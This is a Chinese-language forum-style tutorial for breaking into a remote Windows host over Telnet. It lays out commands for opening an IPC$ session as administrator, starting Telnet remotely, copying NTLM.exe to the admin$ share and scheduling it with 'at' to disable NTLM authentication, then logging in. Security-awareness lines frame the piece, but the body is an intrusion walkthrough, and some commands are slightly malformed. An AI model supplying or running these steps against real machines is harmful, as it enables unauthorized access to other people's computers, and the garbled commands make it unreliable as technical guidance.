Telnet入侵指令区分

随着网络的普及，我们的生活越来越方便，但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑，更要注意上网安全常识，不然病毒会对我们造成严重的威胁。

简单介绍关于NTLM验证

由于Telnet功能太强大，而且也是入侵者使用最频繁的登录手段之一，因此微软公司为Telnet添加了身份验证，称为NTLM验证，它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外，还需要满足NTLM验证关系。 NTLM验证大大增强了Telnet主机的安全性，就像一只拦路虎把很多入侵者拒之门外。（关于NTLM我有写一个专门帖子。。各位可以去看看）

1.使用telnet连接主机

指令格式（cmd）：telnet 192.168.0.0 连接端口号

如果要断开。。就是exit。。

这个本人写了一个很详细的帖子发表在黑盟“远程开启telnet“

2.典型telnet入侵攻略

第一步：建立IPC$连接（本人也写了很详细关于IPC$连接的方法），

第二步：开启远程telnet连接，首先在cmd（确定此时的根目录是目标的）输入指令。。 service 开启service项目。。。仔细找找。。。就有Telnet服务项。。。。把它打开。。。

第三步：取消IPC$连接:net use 192.168.0.0 /del

第四步：去掉NTLM验证，如果没有去除目标上的NTLM验证，在登录目标的电脑的时候就会失败。

其实方法有很多种。。。本人就介绍我最常用的一个。。也是最简单的方法吧。。。

首先，在本地计算机上建立一个与远程主机上相同的账号和密码。

指令：net localgroup alpha /add 不过确定对方的账号也是alpha。。因为要相同的。。

第二步：通过“开始”→“程序”→“附件”找到“命令提示符”，使用鼠标右键单击“命令提示符”，然后选择“属性”。

在“以其他用户身份运行（U）”前面挑上挑。。然后点。。 “确定”接着。。仍然按照上述路径找到“命令提示符”(cmd)。。之后用左健打开它。。。。

之后写上用户名和密码。。。 alpha的

然后点确定。。。得到cmd shell框。。。

之后输入我们的指令：telnet 192.168.0.0

现在就会显示一个更新后的cmd shell。。这个shell就192.168.0.0上的。。。

其实去掉NTLM验证的方法很多。。。我再介绍给大家一个方法。。。

这个方法就是超级菜鸟话。。。因为我们需要用到一个工具。。 NTLM.exe。。这个工具就像是3389.exe一样。。只要把3389.exe传到一台机器上去执行。。那台机器上的3389端口就会自动打开。。。

NTLM.exe的运作概念和3389.exe是一样的。。。我们需要做的就是把我们的NTLM.exe传到192.168.0.0这个机器上。。。

首先：开cmd。。

然后输入指令：net use \\192.168.0.0\ipc$*""\user:administrator

之后再输入指令：copy c:\NTLM.exe \\192.168.0.0\admin$

解释一下：\admin$是使用192.168.0.0主机上的admin用户共享权限。。。。

然后再输入察看时间指令：net time \\192.168.0.0

我们假如对方的时间是2007/9/21 下午3点21分。。。

之后再输入执行指令：at \\192.168.0.0 15:22 NTLM.exe

解释一下：15:22是24小时至的下午3点22分。。。 cmd shell输入指令时一定要写24小时的。。

之后当按回车确定后得到：新增加一项作业　　　　或者是什么指令成功完成的提示字后。。。等待１分钟。。。让cmd完成我们的shell command。。。

之后我们再输入指令：telnet 192.168.0.0

Ok.........................大功告成。。。。

如果要恢复NTLM验证。。。我们要用到一个shell工具：resumetelnet.exe

resumetelnet.exe使用的方法是这样的。。。

命令格式：ResumeTelnet.exe \\\\server name password

其中server name是主机域名或者是IP都可以。。。我们就写192.168.0.0

password当然就是密码了。。。。

回车确定。。。。。。。。。。。。。。。。。。当显示the command completed successfully后。。一切完成。。。。。。。。。。。。

上面是电脑上网安全的一些基础常识，学习了安全知识，几乎可以让你免费电脑中毒的烦扰。

关键词： Telnet入侵指令区分